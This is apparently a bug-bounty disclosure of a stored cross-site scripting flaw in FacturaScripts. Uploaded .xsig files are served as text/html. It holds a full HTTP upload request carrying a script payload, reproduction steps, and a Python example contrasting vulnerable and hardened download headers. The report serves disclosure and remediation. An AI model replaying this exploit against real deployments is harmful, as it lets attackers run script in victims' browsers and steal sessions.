Cross-site scripting - Stored via upload `.xsig` file in neorazorx/facturascripts
Valid
Reported on May 4th 2022
Description
When a user uploads a file with the .xsig extension and then accesses that file directly, the server responds with Content-Type: text/html, so the browser processes the XSIG file as an HTML document.
Proof of Concept
POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"

insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"

EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xsig"
Content-Type: text/html

<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"

0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"

2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"

17:45:45
-----------------------------116175579928758251263819370629--
Steps to reproduce
- Prepare a file xss.xsig with the content: <script>alert(window.origin)</script>
- Upload xss.xsig in Admin -> Library, then click Download: the script executes (XSS).
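The root cause described above is an upload handler that lets an attacker-controlled MIME type reach the download response. The following is an added example (not FacturaScripts code): it assumes the vulnerable handler echoes the MIME type declared in the upload (the multipart part's Content-Type, text/html for xss.xsig) and contrasts it with a header policy that decides the type from an extension allowlist and forces unknown extensions such as .xsig to an opaque download. All function and constant names are hypothetical.

```python
"""Serving uploaded files: the echoed-MIME pattern assumed behind this report
next to a hardened header policy. Added example, not FacturaScripts code."""
import re

# Extensions the browser may render inline, mapped to a fixed Content-Type.
INLINE_SAFE = {
    ".pdf": "application/pdf", ".png": "image/png", ".jpg": "image/jpeg",
    ".jpeg": "image/jpeg", ".gif": "image/gif", ".txt": "text/plain",
}
# Types a browser executes as an active document (script runs in the origin).
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "text/xml", "application/xml"}


def vulnerable_headers(filename: str, client_mime: str) -> dict:
    """Assumed vulnerable pattern: trust the MIME type the uploader declared,
    so a .xsig part tagged text/html is later served as a page."""
    return {"Content-Type": client_mime}


def safe_headers(filename: str, client_mime: str) -> dict:
    """Ignore client_mime; pick the type from the extension allowlist and
    force unknown extensions (such as .xsig) to an opaque download."""
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    if ext in INLINE_SAFE:
        content_type, disposition = INLINE_SAFE[ext], "inline"
    else:
        content_type, disposition = "application/octet-stream", "attachment"
    # Restrict the filename parameter to characters that cannot break the header.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "download"
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'{disposition}; filename="{safe_name}"',
        # Stop browsers from sniffing an octet-stream body into HTML.
        "X-Content-Type-Options": "nosniff",
    }


def renders_as_html(headers: dict) -> bool:
    """True if a browser would treat the response as an active document:
    an active Content-Type that is not forced to download."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    disposition = headers.get("Content-Disposition", "inline").lower()
    return ctype in ACTIVE_TYPES and not disposition.startswith("attachment")


if __name__ == "__main__":
    # Constructed input mirroring the PoC's upload part (xss.xsig as text/html).
    for handler in (vulnerable_headers, safe_headers):
        h = handler("xss.xsig", "text/html")
        print(handler.__name__, h, "renders as HTML:", renders_as_html(h))
```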
Poc Image
Impact
This vulnerability allows arbitrary JavaScript to execute in the victim's browser, which can be used to steal the user's cookies, perform HTTP requests, read the content of same-origin pages, etc.
We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. (a year ago)
The researcher's credibility has increased: +7
We have sent a fix follow up to the neorazorx/facturascripts team. We will try again in 7 days. (a year ago)